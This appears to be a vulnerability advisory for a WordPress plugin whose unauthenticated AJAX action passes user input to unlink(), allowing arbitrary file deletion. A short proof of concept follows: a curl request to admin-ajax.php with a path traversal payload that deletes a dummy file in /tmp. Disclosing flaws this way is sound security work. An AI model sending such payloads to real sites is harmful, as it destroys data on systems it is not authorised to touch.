The plugin suffers from an arbitrary file deletion vulnerability via an AJAX action, accessible to unauthenticated users, which accepts user input that is being used in a path and passed to unlink() without validation first
Create a dummy file on the WordPress host to delete (the file must be owned by the web user):
echo '1' > /tmp/delete_me.txt && chown 'www-data:www-data' /tmp/delete_me.txt
Invoke the following curl command to delete the dummy file:
curl 'http://127.0.0.1/wp-admin/admin-ajax.php' \
--data 'action=mkl_pc_generate_config_image&data=../../../../../../tmp/delete_me.txt'
Verify the file has been deleted cydave
cydave
Yes
2022-06-06 (about 11 months ago)
2022-06-06 (about 11 months ago)
2023-03-08 (about 2 months ago)